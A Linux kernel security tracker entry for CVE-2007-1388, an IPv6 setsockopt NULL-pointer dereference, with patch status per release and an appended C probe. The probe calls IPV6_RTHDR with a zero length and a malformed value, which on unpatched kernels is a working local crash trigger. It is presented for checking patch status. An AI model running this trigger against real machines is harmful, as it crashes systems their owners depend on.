Candidate: CVE-2007-1388
References:
 http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.20.y.git;a=commit;h=4cabf6ba5496bc4a5a59871693145880b240b07b
 http://bugzilla.kernel.org/show_bug.cgi?id=8155
Description:
 The do_ipv6_setsockopt function in net/ipv6/ipv6_sockglue.c in Linux kernel 2.6.17, and possibly other versions, allows local users to cause a denial of service (oops) by calling setsockopt with the IPV6_RTHDR option name and possibly a zero option length or invalid option value, which triggers a NULL pointer dereference.
Ubuntu-Description:
 Gabriel Campana discovered that the do_ipv6_setsockopt() function did not sufficiently verify option values for IPV6_RTHDR. A local attacker could exploit this to trigger a kernel crash.
Notes:
 dannf> Reproducer in the RH bug doesn't work on Debian as-is - you need to use a hardcoded '57' instead of IPV6_RTHDR. That allows you to trigger an oops on unpatched 2.6.18-era kernels, but it is not reproducible in 2.4.27/2.6.8.
Bugs:
upstream: released (2.6.21-rc4)
linux-2.6: released (2.6.21-1)
2.6.18-etch-security: released (2.6.18.dfsg.1-12) [bugfix/ipv6_getsockopt_sticky-null-opt.patch]
2.6.8-sarge-security: N/A
2.4.27-sarge-security: N/A
2.6.15-dapper-security: released (2.6.15-28.54)
2.6.17-edgy-security: released (2.6.17.1-11.38)
2.6.20-feisty-security: released (2.6.20-16.28)
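A minimal probe for the trigger described in the Description field, added here as an illustration; it is not the reproducer from the RH bug and not code from the Debian or Ubuntu trackers. It issues setsockopt(IPPROTO_IPV6, IPV6_RTHDR) on a fresh UDP/IPv6 socket twice: once with a zero option length (the CVE case, which a patched kernel treats per RFC 3542 as "remove the sticky routing header" and accepts), and once with an invalid 3-byte option value that a kernel validating the option must reject with EINVAL. The hardcoded fallback value 57 follows dannf's note; the function names and the PROBE_NO_IPV6_SOCKET sentinel are this example's own. Run it only on a disposable machine if the kernel may be unpatched: on an affected 2.6.18-era kernel the zero-length call does not return an error, it oopses the kernel.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

/* IPV6_RTHDR is 57 on Linux. dannf's note says the RH reproducer needed the
 * literal value on Debian, so fall back to it if the headers lack the macro. */
#ifndef IPV6_RTHDR
#define IPV6_RTHDR 57
#endif

/* Sentinel (example's own): no AF_INET6 socket could be created, so the
 * kernel path under test was never reached (IPv6 disabled or sandboxed). */
#define PROBE_NO_IPV6_SOCKET (-2)

/* Issue setsockopt(IPPROTO_IPV6, IPV6_RTHDR, optval, optlen) on a fresh
 * UDP/IPv6 socket. Returns 0 if the kernel accepted the call, the errno it
 * rejected it with, or PROBE_NO_IPV6_SOCKET. On an unpatched kernel the
 * zero-length variant never returns: the NULL dereference oopses the kernel. */
static int probe_rthdr_setsockopt(const void *optval, socklen_t optlen)
{
    int fd = socket(AF_INET6, SOCK_DGRAM, 0);
    if (fd < 0)
        return PROBE_NO_IPV6_SOCKET;

    int rc = setsockopt(fd, IPPROTO_IPV6, IPV6_RTHDR, optval, optlen);
    int err = (rc == 0) ? 0 : errno;
    close(fd);
    return err;
}

/* The CVE trigger: IPV6_RTHDR with a zero option length. A fixed kernel
 * clears any sticky routing header and returns 0. */
int probe_rthdr_zero_length(void)
{
    return probe_rthdr_setsockopt(NULL, 0);
}

/* An invalid option value: 3 bytes is neither 0 nor a legal routing-header
 * length (must be a non-zero multiple of 8). A validating kernel rejects it
 * (EINVAL on Linux) instead of interpreting the buffer. */
int probe_rthdr_bad_length(void)
{
    unsigned char junk[3] = {0, 0, 0}; /* constructed, deliberately malformed */
    return probe_rthdr_setsockopt(junk, sizeof junk);
}

int main(void)
{
    int r0 = probe_rthdr_zero_length();
    int r1 = probe_rthdr_bad_length();

    if (r0 == PROBE_NO_IPV6_SOCKET) {
        puts("no IPv6 socket available; probe skipped");
        return 0;
    }
    printf("IPV6_RTHDR, optlen 0 -> %s\n",
           r0 ? strerror(r0) : "accepted (sticky header cleared)");
    printf("IPV6_RTHDR, optlen 3 -> %s\n",
           r1 ? strerror(r1) : "ACCEPTED: kernel did not validate the option");
    return 0;
}
```

If the first call returns at all, the zero-length path is not the oopsing one from this CVE; a kernel that accepts the 3-byte value is mishandling the option regardless of version and should be treated as unpatched.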